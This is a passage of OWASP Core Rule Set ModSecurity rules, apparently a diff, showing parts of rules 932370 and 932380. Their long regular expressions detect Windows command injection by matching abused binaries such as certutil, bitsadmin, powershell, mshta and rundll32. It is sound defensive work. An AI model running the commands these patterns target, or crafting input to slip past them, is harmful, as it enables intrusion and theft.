\^]*t[\"\^]*i[\"\^]*a[\"\^]*l[\"\^]*d[\"\^]*e[\"\^]*p[\"\^]*l[\"\^]*o[\"\^]*y[\"\^]*m[\"\^]*e[\"\^]*n[\"\^]*t|t[\"\^]*o[\"\^]*o[\"\^]*l[\"\^]*s[\"\^]*l[\"\^]*a[\"\^]*u[\"\^]*n[\"\^]*c[\"\^]*h[\"\^]*e[\"\^]*r))|f[\"\^]*s[\"\^]*(?:h[\"\^]*i[\"\^]*m|v[\"\^]*c)|i[\"\^]*(?:a[\"\^]*n[\"\^]*t[\"\^]*z|s[\"\^]*k[\"\^]*s[\"\^]*h[\"\^]*a[\"\^]*d[\"\^]*o[\"\^]*w)|n[\"\^]*(?:s[\"\^]*c[\"\^]*m[\"\^]*d|x)|o[\"\^]*t[\"\^]*n[\"\^]*e[\"\^]*t|u[\"\^]*m[\"\^]*p[\"\^]*6[\"\^]*4|x[\"\^]*c[\"\^]*a[\"\^]*p)|e[\"\^]*(?:s[\"\^]*e[\"\^]*n[\"\^]*t[\"\^]*u[\"\^]*t[\"\^]*l|v[\"\^]*e[\"\^]*n[\"\^]*t[\"\^]*v[\"\^]*w[\"\^]*r|x[\"\^]*(?:c[\"\^]*e[\"\^]*l|p[\"\^]*(?:a[\"\^]*n[\"\^]*d|l[\"\^]*o[\"\^]*r[\"\^]*e[\"\^]*r)|t[\"\^]*(?:e[\"\^]*x[\"\^]*p[\"\^]*o[\"\^]*r[\"\^]*t|r[\"\^]*a[\"\^]*c[\"\^]*3[\"\^]*2)))|f[\"\^]*(?:i[\"\^]*n[\"\^]*(?:d[\"\^]*s[\"\^]*t|g[\"\^]*e)[\"\^]*r|l[\"\^]*t[\"\^]*m[\"\^]*c|o[\"\^]*r[\"\^]*f[\"\^]*i[\"\^]*l[\"\^]*e[\"\^]*s|s[\"\^]*(?:i(?:[\"\^]*a[\"\^]*n[\"\^]*y[\"\^]*c[\"\^]*p[\"\^]*u)?|u[\"\^]*t[\"\^]*i[\"\^]*l)|t[\"\^]*p)|g[\"\^]*(?:f[\"\^]*x[\"\^]*d[\"\^]*o[\"\^]*w[\"\^]*n[\"\^]*l[\"\^]*o[\"\^]*a[\"\^]*d[\"\^]*w[\"\^]*r[\"\^]*a[\"\^]*p[\"\^]*p[\"\^]*e[\"\^]*r|p[\"\^]*s[\"\^]*c[\"\^]*r[\"\^]*i[\"\^]*p[\"\^]*t)|h[\"\^]*h|i[\"\^]*(?:e[\"\^]*(?:4[\"\^]*u[\"\^]*i[\"\^]*n[\"\^]*i[\"\^]*t|a[\"\^]*d[\"\^]*v[\"\^]*p[\"\^]*a[\"\^]*c[\"\^]*k|e[\"\^]*x[\"\^]*e[\"\^]*c|f[\"\^]*r[\"\^]*a[\"\^]*m[\"\^]*e)|l[\"\^]*a[\"\^]*s[\"\^]*m|m[\"\^]*e[\"\^]*w[\"\^]*d[\"\^]*b[\"\^]*l[\"\^]*d|n[\"\^]*(?:f[\"\^]*d[\"\^]*e[\"\^]*f[\"\^]*a[\"\^]*u[\"\^]*l[\"\^]*t[\"\^]*i[\"\^]*n[\"\^]*s[\"\^]*t[\"\^]*a[\"\^]*l|s[\"\^]*t[\"\^]*a[\"\^]*l[\"\^]*l[\"\^]*u[\"\^]*t[\"\^]*i)[\"\^]*l)|j[\"\^]*s[\"\^]*c|l[\"\^]*(?:a[\"\^]*u[\"\^]*n[\"\^]*c[\"\^]*h[\"\^]*-[\"\^]*v[\"\^]*s[\"\^]*d[\"\^]*e[\"\^]*v[\"\^]*s[\"\^]*h[\"\^]*e[\"\^]*l[\"\^]*l|d[\"\^]*i[\"\^]*f[\"\^]*d[\"\^]*e)|m[\"\^]*(?:a[\"\^]*(?:k[\"\^]*e[\"\^]*c[\"\^]*a[\"\^]*b|n[\"\^]*a[\"\^]*g[\"\^]*e[\"\^]*-[\"\^]*b[\"\^]*d[\"\^]*e|v[\"\^]*i[\"\^]*n[\"\^]*j[\"\^]*e[\"\^]*c[\"\^]*t)|f[\"\^]*t[\"\^]*r[\"\^]*a[\"\^]*c[\"\^]*e|i[\"\^]*c[\"\^]*r[\"\^]*o[\"\^]*s[\"\^]*o[\"\^]*f[\"\^]*t|m[\"\^]*c|p[\"\^]*c[\"\^]*m[\"\^]*d[\"\^]*r[\"\^]*u[\"\^]*n|s[\"\^]*(?:(?:b[\"\^]*u[\"\^]*i[\"\^]*l|o[\"\^]*h[\"\^]*t[\"\^]*m[\"\^]*e)[\"\^]*d|c[\"\^]*o[\"\^]*n[\"\^]*f[\"\^]*i[\"\^]*g|d[\"\^]*(?:e[\"\^]*p[\"\^]*l[\"\^]*o[\"\^]*y|t)|h[\"\^]*t[\"\^]*(?:a|m[\"\^]*l)|i[\"\^]*e[\"\^]*x[\"\^]*e[\"\^]*c|p[\"\^]*u[\"\^]*b|x[\"\^]*s[\"\^]*l))|n[\"\^]*(?:e[\"\^]*t[\"\^]*s[\"\^]*h|t[\"\^]*d[\"\^]*s[\"\^]*u[\"\^]*t[\"\^]*i[\"\^]*l)|o[\"\^]*(?:d[\"\^]*b[\"\^]*c[\"\^]*c[\"\^]*o[\"\^]*n[\"\^]*f|f[\"\^]*f[\"\^]*l[\"\^]*i[\"\^]*n[\"\^]*e[\"\^]*s[\"\^]*c[\"\^]*a[\"\^]*n[\"\^]*n[\"\^]*e[\"\^]*r[\"\^]*s[\"\^]*h[\"\^]*e[\"\^]*l[\"\^]*l|n[\"\^]*e[\"\^]*d[\"\^]*r[\"\^]*i[\"\^]*v[\"\^]*e[\"\^]*s[\"\^]*t[\"\^]*a[\"\^]*n[\"\^]*d[\"\^]*a[\"\^]*l[\"\^]*o[\"\^]*n[\"\^]*e[\"\^]*u[\"\^]*p[\"\^]*d[\"\^]*a[\"\^]*t[\"\^]*e[\"\^]*r|p[\"\^]*e[\"\^]*n[\"\^]*c[\"\^]*o[\"\^]*n[\"\^]*s[\"\^]*o[\"\^]*l[\"\^]*e)|p[\"\^]*(?:c[\"\^]*(?:a[\"\^]*l[\"\^]*u[\"\^]*a|w[\"\^]*(?:r[\"\^]*u[\"\^]*n|u[\"\^]*t[\"\^]*l))|(?:e[\"\^]*s[\"\^]*t[\"\^]*e|s)[\"\^]*r|(?:k[\"\^]*t[\"\^]*m[\"\^]*o|u[\"\^]*b[\"\^]*p[\"\^]*r)[\"\^]*n|n[\"\^]*p[\"\^]*u[\"\^]*t[\"\^]*i[\"\^]*l|o[\"\^]*w[\"\^]*e[\"\^]*r[\"\^]*p[\"\^]*n[\"\^]*t|r[\"\^]*(?:e[\"\^]*s[\"\^]*e[\"\^]*n[\"\^]*t[\"\^]*a[\"\^]*t[\"\^]*i[\"\^]*o[\"\^]*n[\"\^]*h[\"\^]*o[\"\^]*s[\"\^]*t|i[\"\^]*n[\"\^]*t(?:[\"\^]*b[\"\^]*r[\"\^]*m)?|o[\"\^]*(?:c[\"\^]*d[\"\^]*u[\"\^]*m[\"\^]*p|t[\"\^]*o[\"\^]*c[\"\^]*o[\"\^]*l[\"\^]*h[\"\^]*a[\"\^]*n[\"\^]*d[\"\^]*l[\"\^]*e[\"\^]*r)))|r[\"\^]*(?:a[\"\^]*s[\"\^]*a[\"\^]*u[\"\^]*t[\"\^]*o[\"\^]*u|c[\"\^]*s[\"\^]*i|(?:d[\"\^]*r[\"\^]*l[\"\^]*e[\"\^]*a[\"\^]*k[\"\^]*d[\"\^]*i[\"\^]*a|p[\"\^]*c[\"\^]*p[\"\^]*i[\"\^]*n)[\"\^]*g|e[\"\^]*(?:g(?:[\"\^]*(?:a[\"\^]*s[\"\^]*m|e[\"\^]*d[\"\^]*i[\"\^]*t|i[\"\^]*(?:n[\"\^]*i|s[\"\^]*t[\"\^]*e[\"\^]*r[\"\^]*-[\"\^]*c[\"\^]*i[\"\^]*m[\"\^]*p[\"\^]*r[\"\^]*o[\"\^]*v[\"\^]*i[\"\^]*d[\"\^]*e[\"\^]*r)|s[\"\^]*v[\"\^]*(?:c[\"\^]*s|r[\"\^]*3[\"\^]*2)))?|(?:m[\"\^]*o[\"\^]*t|p[\"\^]*l[\"\^]*a[\"\^]*c)[\"\^]*e)|u[\"\^]*n[\"\^]*(?:d[\"\^]*l[\"\^]*l[\"\^]*3[\"\^]*2|(?:e[\"\^]*x[\"\^]*e|s[\"\^]*c[\"\^]*r[\"\^]*i[\"\^]*p[\"\^]*t)[\"\^]*h[\"\^]*e[\"\^]*l[\"\^]*p[\"\^]*e[\"\^]*r|o[\"\^]*n[\"\^]*c[\"\^]*e))|s[\"\^]*(?:c[\"\^]*(?:[\s\v,\.-/;-<>].*|h[\"\^]*t[\"\^]*a[\"\^]*s[\"\^]*k[\"\^]*s|r[\"\^]*i[\"\^]*p[\"\^]*t[\"\^]*r[\"\^]*u[\"\^]*n[\"\^]*n[\"\^]*e[\"\^]*r)|e[\"\^]*t[\"\^]*(?:r[\"\^]*e[\"\^]*s|t[\"\^]*i[\"\^]*n[\"\^]*g[\"\^]*s[\"\^]*y[\"\^]*n[\"\^]*c[\"\^]*h[\"\^]*o[\"\^]*s[\"\^]*t|u[\"\^]*p[\"\^]*a[\"\^]*p[\"\^]*i)|h[\"\^]*(?:d[\"\^]*o[\"\^]*c[\"\^]*v[\"\^]*w|e[\"\^]*l[\"\^]*l[\"\^]*3[\"\^]*2)|q[\"\^]*(?:l[\"\^]*(?:d[\"\^]*u[\"\^]*m[\"\^]*p[\"\^]*e[\"\^]*r|(?:t[\"\^]*o[\"\^]*o[\"\^]*l[\"\^]*s[\"\^]*)?p[\"\^]*s)|u[\"\^]*i[\"\^]*r[\"\^]*r[\"\^]*e[\"\^]*l)|s[\"\^]*h|t[\"\^]*o[\"\^]*r[\"\^]*d[\"\^]*i[\"\^]*a[\"\^]*g|y[\"\^]*(?:n[\"\^]*c[\"\^]*a[\"\^]*p[\"\^]*p[\"\^]*v[\"\^]*p[\"\^]*u[\"\^]*b[\"\^]*l[\"\^]*i[\"\^]*s[\"\^]*h[\"\^]*i[\"\^]*n[\"\^]*g[\"\^]*s[\"\^]*e[\"\^]*r[\"\^]*v[\"\^]*e[\"\^]*r|s[\"\^]*s[\"\^]*e[\"\^]*t[\"\^]*u[\"\^]*p))|t[\"\^]*(?:e[\"\^]*[\s\v,\.-/;-<>].*|r[\"\^]*a[\"\^]*c[\"\^]*k[\"\^]*e[\"\^]*r|t[\"\^]*(?:d[\"\^]*i[\"\^]*n[\"\^]*j[\"\^]*e[\"\^]*c[\"\^]*t|t[\"\^]*r[\"\^]*a[\"\^]*c[\"\^]*e[\"\^]*r))|u[\"\^]*(?:n[\"\^]*r[\"\^]*e[\"\^]*g[\"\^]*m[\"\^]*p[\"\^]*2|p[\"\^]*d[\"\^]*a[\"\^]*t[\"\^]*e|r[\"\^]*l|t[\"\^]*i[\"\^]*l[\"\^]*i[\"\^]*t[\"\^]*y[\"\^]*f[\"\^]*u[\"\^]*n[\"\^]*c[\"\^]*t[\"\^]*i[\"\^]*o[\"\^]*n[\"\^]*s)|v[\"\^]*(?:b[\"\^]*c|e[\"\^]*r[\"\^]*c[\"\^]*l[\"\^]*s[\"\^]*i[\"\^]*d|i[\"\^]*s[\"\^]*u[\"\^]*a[\"\^]*l[\"\^]*u[\"\^]*i[\"\^]*a[\"\^]*v[\"\^]*e[\"\^]*r[\"\^]*i[\"\^]*f[\"\^]*y[\"\^]*n[\"\^]*a[\"\^]*t[\"\^]*i[\"\^]*v[\"\^]*e|s[\"\^]*(?:i[\"\^]*i[\"\^]*s[\"\^]*e[\"\^]*x[\"\^]*e[\"\^]*l[\"\^]*a[\"\^]*u[\"\^]*n[\"\^]*c[\"\^]*h|j[\"\^]*i[\"\^]*t[\"\^]*d[\"\^]*e[\"\^]*b[\"\^]*u[\"\^]*g[\"\^]*g)[\"\^]*e[\"\^]*r)|w[\"\^]*(?:a[\"\^]*b|(?:f|m[\"\^]*i)[\"\^]*c|i[\"\^]*n[\"\^]*(?:g[\"\^]*e[\"\^]*t|r[\"\^]*m|w[\"\^]*o[\"\^]*r[\"\^]*d)|l[\"\^]*r[\"\^]*m[\"\^]*d[\"\^]*r|o[\"\^]*r[\"\^]*k[\"\^]*f[\"\^]*o[\"\^]*l[\"\^]*d[\"\^]*e[\"\^]*r[\"\^]*s|s[\"\^]*(?:(?:c[\"\^]*r[\"\^]*i[\"\^]*p|r[\"\^]*e[\"\^]*s[\"\^]*e)[\"\^]*t|l)|t[\"\^]*[\s\v,\.-/;-<>].*|u[\"\^]*a[\"\^]*u[\"\^]*c[\"\^]*l[\"\^]*t)|x[\"\^]*w[\"\^]*i[\"\^]*z[\"\^]*a[\"\^]*r[\"\^]*d|z[\"\^]*i[\"\^]*p[\"\^]*f[\"\^]*l[\"\^]*d[\"\^]*r)(?:\.[\"\^]*[0-9A-Z_a-z]+)?\b" \ + "id:932370,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Remote Command Execution: Windows Command Injection',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-windows',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# +# This rule detects Windows shell command injections. +# If you are not running Windows, it is safe to disable this rule. +# +# New in CRSv4: The rules 932110 and 932115 were reorganized and renumbered to 932370 and 932380. +# The new rules target specific Windows binaries to simplify future updates of the command list. +# +# See rule 932370 above for further explanation. +# +# This rule is case-insensitive. +# +# Regular expression generated from regex-assembly/932380.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932380 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:t[\"\^]*i[\"\^]*m[\"\^]*e|[\n\r;`\{]|\|\|?|&&?)[\s\v]*[\s\v\"'-\(,@]*(?:[\"'\.-9A-Z_a-z]+/|(?:[\"'\x5c\^]*[0-9A-Z_a-z][\"'\x5c\^]*:.*|[ \"'\.-9A-Z\x5c\^-_a-z]*)\x5c)?[\"\^]*(?:a[\"\^]*(?:s[\"\^]*s[\"\^]*o[\"\^]*c|t[\"\^]*(?:m[\"\^]*a[\"\^]*d[\"\^]*m|t[\"\^]*r[\"\^]*i[\"\^]*b)|u[\"\^]*(?:d[\"\^]*i[\"\^]*t[\"\^]*p[\"\^]*o[\"\^]*l|t[\"\^]*o[\"\^]*(?:c[\"\^]*(?:h[\"\^]*k|o[\"\^]*n[\"\^]*v)|(?:f[\"\^]*m|m[\"\^]*o[\"\^]*u[\"\^]*n)[\"\^]*t)))|b[\"\^]*(?:c[\"\^]*d[\"\^]*(?:b[\"\^]*o[\"\^]*o|e[\"\^]*d[\"\^]*i)[\"\^]*t|(?:d[\"\^]*e[\"\^]*h[\"\^]*d|o[\"\^]*o[\"\^]*t)[\"\^]*c[\"\^]*f[\"\^]*g|i[\"\^]*t[\"\^]*s[\"\^]*a[\"\^]*d[\"\^]*m[\"\^]*i[\"\^]*n)|c[\"\^]*(?:a[\"\^]*c[\"\^]*l[\"\^]*s|e[\"\^]*r[\"\^]*t[\"\^]*(?:r[\"\^]*e[\"\^]*q|u[\"\^]*t[\"\^]*i[\"\^]*l)|h[\"\^]*(?:c[\"\^]*p|d[\"\^]*i[\"\^]*r|g[\"\^]*(?:l[\"\^]*o[\"\^]*g[\"\^]*o[\"\^]*n|p[\"\^]*o[\"\^]*r[\"\^]*t|u[\"\^]*s[\"\^]*r)|k[\"\^]*(?:d[\"\^]*s[\"\^]*k|n[\"\^]*t[\"\^]*f[\"\^]*s))|l[\"\^]*e[\"\^]*a[\"\^]*n[\"\^]*m[\"\^]*g[\"\^]*r|m[\"\^]*(?:d(?:[\"\^]*k[\"\^]*e[\"\^]*y)?|s[\"\^]*t[\"\^]*p)|s[\"\^]*c[\"\^]*r[\"\^]*i[\"\^]*p[\"\^]*t)|d[\"\^]*(?:c[\"\^]*(?:d[\"\^]*i[\"\^]*a[\"\^]*g|g[\"\^]*p[\"\^]*o[\"\^]*f[\"\^]*i[\"\^]*x)|e[\"\^]*(?:f[\"\^]*r[\"\^]*a[\"\^]*g|l)|f[\"\^]*s[\"\^]*(?:d[\"\^]*i[\"\^]*a|r[\"\^]*m[\"\^]*i)[\"\^]*g|i[\"\^]*(?:a[\"\^]*n[\"\^]*t[\"\^]*z|r|s[\"\^]*(?:k[\"\^]*(?:c[\"\^]*o[\"\^]*(?:m[\"\^]*p|p[\"\^]*y)|p[\"\^]*(?:a[\"\^]*r[\"\^]*t|e[\"\^]*r[\"\^]*f)|r[\"\^]*a[\"\^]*i[\"\^]*d|s[\"\^]*h[\"\^]*a[\"\^]*d[\"\^]*o[\"\^]*w)|p[\"\^]*d[\"\^]*i[\"\^]*a[\"\^]*g))|n[\"\^]*s[\"\^]*c[\"\^]*m[\"\^]*d|(?:o[\"\^]*s[\"\^]*k[\"\^]*e|r[\"\^]*i[\"\^]*v[\"\^]*e[\"\^]*r[\"\^]*q[\"\^]*u[\"\^]*e[\"\^]*r)[\"\^]*y)|e[\"\^]*(?:n[\"\^]*d[\"\^]*l[\"\^]*o[\"\^]*c[\"\^]*a[\"\^]*l|v[\"\^]*e[\"\^]*n[\"\^]*t[\"\^]*c[\"\^]*r[\"\^]*e[\"\^]*a[\"\^]*t[\"\^]*e)|E[\"\^]*v[\"\^]*n[\"\^]*t[\"\^]*c[\"\^]*m[\"\^]*d|f[\"\^]*(?:c|i[\"\^]*(?:l[\"\^]*e[\"\^]*s[\"\^]*y[\"\^]*s[\"\^]*t[\"\^]*e[\"\^]*m[\"\^]*s|n[\"\^]*d[\"\^]*s[\"\^]*t[\"\^]*r)|l[\"\^]*a[\"\^]*t[\"\^]*t[\"\^]*e[\"\^]*m[\"\^]*p|o[\"\^]*r(?:[\"\^]*f[\"\^]*i[\"\^]*l[\"\^]*e[\"\^]*s)?|r[\"\^]*e[\"\^]*e[\"\^]*d[\"\^]*i[\"\^]*s[\"\^]*k|s[\"\^]*u[\"\^]*t[\"\^]*i[\"\^]*l|(?:t[\"\^]*y[\"\^]*p|v[\"\^]*e[\"\^]*u[\"\^]*p[\"\^]*d[\"\^]*a[\"\^]*t)[\"\^]*e)|g[\"\^]*(?:e[\"\^]*t[\"\^]*(?:m[\"\^]*a[\"\^]*c|t[\"\^]*y[\"\^]*p[\"\^]*e)|o[\"\^]*t[\"\^]*o|p[\"\^]*(?:f[\"\^]*i[\"\^]*x[\"\^]*u[\"\^]*p|(?:r[\"\^]*e[\"\^]*s[\"\^]*u[\"\^]*l[\"\^]*)?t|u[\"\^]*p[\"\^]*d[\"\^]*a[\"\^]*t[\"\^]*e)|r[\"\^]*a[\"\^]*f[\"\^]*t[\"\^]*a[\"\^]*b[\"\^]*l)|h[\"\^]*(?:e[\"\^]*l[\"\^]*p[\"\^]*c[\"\^]*t[\"\^]*r|o[\"\^]*s[\"\^]*t[\"\^]*n[\"\^]*a[\"\^]*m[\"\^]*e)|i[\"\^]*(?:c[\"\^]*a[\"\^]*c[\"\^]*l[\"\^]*s|f|p[\"\^]*(?:c[\"\^]*o[\"\^]*n[\"\^]*f[\"\^]*i[\"\^]*g|x[\"\^]*r[\"\^]*o[\"\^]*u[\"\^]*t[\"\^]*e)|r[\"\^]*f[\"\^]*t[\"\^]*p)|j[\"\^]*e[\"\^]*t[\"\^]*p[\"\^]*a[\"\^]*c[\"\^]*k|k[\"\^]*(?:l[\"\^]*i[\"\^]*s[\"\^]*t|s[\"\^]*e[\"\^]*t[\"\^]*u[\"\^]*p|t[\"\^]*(?:m[\"\^]*u[\"\^]*t[\"\^]*i[\"\^]*l|p[\"\^]*a[\"\^]*s[\"\^]*s))|l[\"\^]*(?:o[\"\^]*(?:d[\"\^]*c[\"\^]*t[\"\^]*r|g[\"\^]*(?:m[\"\^]*a[\"\^]*n|o[\"\^]*f[\"\^]*f))|p[\"\^]*[q-r])|m[\"\^]*(?:a[\"\^]*(?:c[\"\^]*f[\"\^]*i[\"\^]*l[\"\^]*e|k[\"\^]*e[\"\^]*c[\"\^]*a[\"\^]*b|p[\"\^]*a[\"\^]*d[\"\^]*m[\"\^]*i[\"\^]*n)|k[\"\^]*(?:d[\"\^]*i[\"\^]*r|l[\"\^]*i[\"\^]*n[\"\^]*k)|m[\"\^]*c|o[\"\^]*u[\"\^]*n[\"\^]*t[\"\^]*v[\"\^]*o[\"\^]*l|q[\"\^]*(?:b[\"\^]*k[\"\^]*u[\"\^]*p|(?:t[\"\^]*g[\"\^]*)?s[\"\^]*v[\"\^]*c)|s[\"\^]*(?:d[\"\^]*t|i[\"\^]*(?:e[\"\^]*x[\"\^]*e[\"\^]*c|n[\"\^]*f[\"\^]*o[\"\^]*3[\"\^]*2)|t[\"\^]*s[\"\^]*c))|n[\"\^]*(?:b[\"\^]*t[\"\^]*s[\"\^]*t[\"\^]*a[\"\^]*t|e[\"\^]*t[\"\^]*(?:c[\"\^]*f[\"\^]*g|d[\"\^]*o[\"\^]*m|s[\"\^]*(?:h|t[\"\^]*a[\"\^]*t))|f[\"\^]*s[\"\^]*(?:a[\"\^]*d[\"\^]*m[\"\^]*i[\"\^]*n|s[\"\^]*(?:h[\"\^]*a[\"\^]*r[\"\^]*e|t[\"\^]*a[\"\^]*t))|l[\"\^]*(?:b[\"\^]*m[\"\^]*g[\"\^]*r|t[\"\^]*e[\"\^]*s[\"\^]*t)|s[\"\^]*l[\"\^]*o[\"\^]*o[\"\^]*k[\"\^]*u[\"\^]*p|t[\"\^]*(?:b[\"\^]*a[\"\^]*c[\"\^]*k[\"\^]*u[\"\^]*p|c[\"\^]*m[\"\^]*d[\"\^]*p[\"\^]*r[\"\^]*o[\"\^]*m[\"\^]*p[\"\^]*t|f[\"\^]*r[\"\^]*s[\"\^]*u[\"\^]*t[\"\^]*l))|o[\"\^]*(?:f[\"\^]*f[\"\^]*l[\"\^]*i[\"\^]*n[\"\^]*e|p[\"\^]*e[\"\^]*n[\"\^]*f[\"\^]*i[\"\^]*l[\"\^]*e[\"\^]*s)|p[\"\^]*(?:a[\"\^]*(?:g[\"\^]*e[\"\^]*f[\"\^]*i[\"\^]*l[\"\^]*e[\"\^]*c[\"\^]*o[\"\^]*n[\"\^]*f[\"\^]*i|t[\"\^]*h[\"\^]*p[\"\^]*i[\"\^]*n)[\"\^]*g|(?:b[\"\^]*a[\"\^]*d[\"\^]*m[\"\^]*i|k[\"\^]*t[\"\^]*m[\"\^]*o)[\"\^]*n|e[\"\^]*(?:n[\"\^]*t[\"\^]*n[\"\^]*t|r[\"\^]*f[\"\^]*m[\"\^]*o[\"\^]*n)|n[\"\^]*p[\"\^]*u[\"\^]*(?:n[\"\^]*a[\"\^]*t[\"\^]*t[\"\^]*e[\"\^]*n[\"\^]*d|t[\"\^]*i[\"\^]*l)|o[\"\^]*(?:p[\"\^]*d|w[\"\^]*e[\"\^]*r[\"\^]*s[\"\^]*h[\"\^]*e[\"\^]*l[\"\^]*l)|r[\"\^]*n[\"\^]*(?:c[\"\^]*n[\"\^]*f[\"\^]*g|(?:d[\"\^]*r[\"\^]*v|m[\"\^]*n[\"\^]*g)[\"\^]*r|j[\"\^]*o[\"\^]*b[\"\^]*s|p[\"\^]*o[\"\^]*r[\"\^]*t|q[\"\^]*c[\"\^]*t[\"\^]*l)|u[\"\^]*(?:b[\"\^]*p[\"\^]*r[\"\^]*n|s[\"\^]*h[\"\^]*(?:d|p[\"\^]*r[\"\^]*i[\"\^]*n[\"\^]*t[\"\^]*e[\"\^]*r[\"\^]*c[\"\^]*o[\"\^]*n[\"\^]*n[\"\^]*e[\"\^]*c[\"\^]*t[\"\^]*i[\"\^]*o[\"\^]*n[\"\^]*s))|w[\"\^]*(?:l[\"\^]*a[\"\^]*u[\"\^]*n[\"\^]*c[\"\^]*h[\"\^]*e[\"\^]*r|s[\"\^]*h))|q[\"\^]*(?:a[\"\^]*p[\"\^]*p[\"\^]*s[\"\^]*r[\"\^]*v|p[\"\^]*r[\"\^]*o[\"\^]*c[\"\^]*e[\"\^]*s[\"\^]*s|u[\"\^]*s[\"\^]*e[\"\^]*r|w[\"\^]*i[\"\^]*n[\"\^]*s[\"\^]*t[\"\^]*a)|r[\"\^]*(?:d(?:[\"\^]*p[\"\^]*s[\"\^]*i[\"\^]*g[\"\^]*n)?|e[\"\^]*(?:f[\"\^]*s[\"\^]*u[\"\^]*t[\"\^]*i[\"\^]*l|g(?:[\"\^]*(?:i[\"\^]*n[\"\^]*i|s[\"\^]*v[\"\^]*r[\"\^]*3[\"\^]*2))?|l[\"\^]*o[\"\^]*g|(?:(?:p[\"\^]*a[\"\^]*d[\"\^]*m[\"\^]*i|s[\"\^]*c[\"\^]*a)[\"\^]*)?n|x[\"\^]*e[\"\^]*c)|i[\"\^]*s[\"\^]*e[\"\^]*t[\"\^]*u[\"\^]*p|m[\"\^]*d[\"\^]*i[\"\^]*r|o[\"\^]*b[\"\^]*o[\"\^]*c[\"\^]*o[\"\^]*p[\"\^]*y|p[\"\^]*c[\"\^]*(?:i[\"\^]*n[\"\^]*f[\"\^]*o|p[\"\^]*i[\"\^]*n[\"\^]*g)|s[\"\^]*h|u[\"\^]*n[\"\^]*d[\"\^]*l[\"\^]*l[\"\^]*3[\"\^]*2|w[\"\^]*i[\"\^]*n[\"\^]*s[\"\^]*t[\"\^]*a)|s[\"\^]*(?:a[\"\^]*n|c[\"\^]*(?:h[\"\^]*t[\"\^]*a[\"\^]*s[\"\^]*k[\"\^]*s|w[\"\^]*c[\"\^]*m[\"\^]*d)|e[\"\^]*(?:c[\"\^]*e[\"\^]*d[\"\^]*i[\"\^]*t|r[\"\^]*v[\"\^]*e[\"\^]*r[\"\^]*(?:(?:c[\"\^]*e[\"\^]*i[\"\^]*p|w[\"\^]*e[\"\^]*r)[\"\^]*o[\"\^]*p[\"\^]*t[\"\^]*i[\"\^]*n|m[\"\^]*a[\"\^]*n[\"\^]*a[\"\^]*g[\"\^]*e[\"\^]*r[\"\^]*c[\"\^]*m[\"\^]*d)|t[\"\^]*x)|f[\"\^]*c|(?:h[\"\^]*o[\"\^]*w[\"\^]*m[\"\^]*o[\"\^]*u[\"\^]*n|u[\"\^]*b[\"\^]*s)[\"\^]*t|x[\"\^]*s[\"\^]*t[\"\^]*r[\"\^]*a[\"\^]*c[\"\^]*e|y[\"\^]*s[\"\^]*(?:o[\"\^]*c[\"\^]*m[\"\^]*g[\"\^]*r|t[\"\^]*e[\"\^]*m[\"\^]*i[\"\^]*n[\"\^]*f[\"\^]*o))|t[\"\^]*(?:a[\"\^]*(?:k[\"\^]*e[\"\^]*o[\"\^]*w[\"\^]*n|p[\"\^]*i[\"\^]*c[\"\^]*f[\"\^]*g|s[\"\^]*k[\"\^]*(?:k[\"\^]*i[\"\^]*l[\"\^]*l|l[\"\^]*i[\"\^]*s[\"\^]*t))|(?:c[\"\^]*m[\"\^]*s[\"\^]*e[\"\^]*t[\"\^]*u|f[\"\^]*t)[\"\^]*p|(?:(?:e[\"\^]*l[\"\^]*n[\"\^]*e|i[\"\^]*m[\"\^]*e[\"\^]*o[\"\^]*u)[\"\^]*|r[\"\^]*a[\"\^]*c[\"\^]*e[\"\^]*r[\"\^]*(?:p[\"\^]*)?)t|l[\"\^]*n[\"\^]*t[\"\^]*a[\"\^]*d[\"\^]*m[\"\^]*n|p[\"\^]*m[\"\^]*(?:t[\"\^]*o[\"\^]*o[\"\^]*l|v[\"\^]*s[\"\^]*c[\"\^]*m[\"\^]*g[\"\^]*r)|s[\"\^]*(?:(?:d[\"\^]*i[\"\^]*s[\"\^]*)?c[\"\^]*o[\"\^]*n|e[\"\^]*c[\"\^]*i[\"\^]*m[\"\^]*p|k[\"\^]*i[\"\^]*l[\"\^]*l|p[\"\^]*r[\"\^]*o[\"\^]*f)|y[\"\^]*p[\"\^]*e[\"\^]*p[\"\^]*e[\"\^]*r[\"\^]*f|z[\"\^]*u[\"\^]*t[\"\^]*i[\"\^]*l)|u[\"\^]*n[\"\^]*(?:e[\"\^]*x[\"\^]*p[\"\^]*o[\"\^]*s[\"\^]*e|i[\"\^]*q[\"\^]*u[\"\^]*e[\"\^]*i[\"\^]*d|l[\"\^]*o[\"\^]*d[\"\^]*c[\"\^]*t[\"\^]*r)|v[\"\^]*(?:o[\"\^]*l|s[\"\^]*s[\"\^]*a[\"\^]*d[\"\^]*m[\"\^]*i[\"\^]*n)|w[\"\^]*(?:a[\"\^]*i[\"\^]*t[\"\^]*f[\"\^]*o[\"\^]*r|b[\"\^]*a[\"\^]*d[\"\^]*m[\"\^]*i[\"\^]*n|(?:d[\"\^]*s|e[\"\^]*(?:c|v[\"\^]*t))[\"\^]*u[\"\^]*t[\"\^]*i[\"\^]*l|h[\"\^]*(?:e[\"\^]*r[\"\^]*e|o[\"\^]*a[\"\^]*m[\"\^]*i)|i[\"\^]*n[\"\^]*(?:n[\"\^]*t(?:[\"\^]*3[\"\^]*2)?|r[\"\^]*s)|m[\"\^]*i[\"\^]*c|s[\"\^]*c[\"\^]*r[\"\^]*i[\"\^]*p[\"\^]*t)|x[\"\^]*c[\"\^]*o[\"\^]*p[\"\^]*y)(?:\.[\"\^]*[0-9A-Z_a-z]+)?\b" \ + "id:932380,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Remote Command Execution: Windows Command Injection',\ + 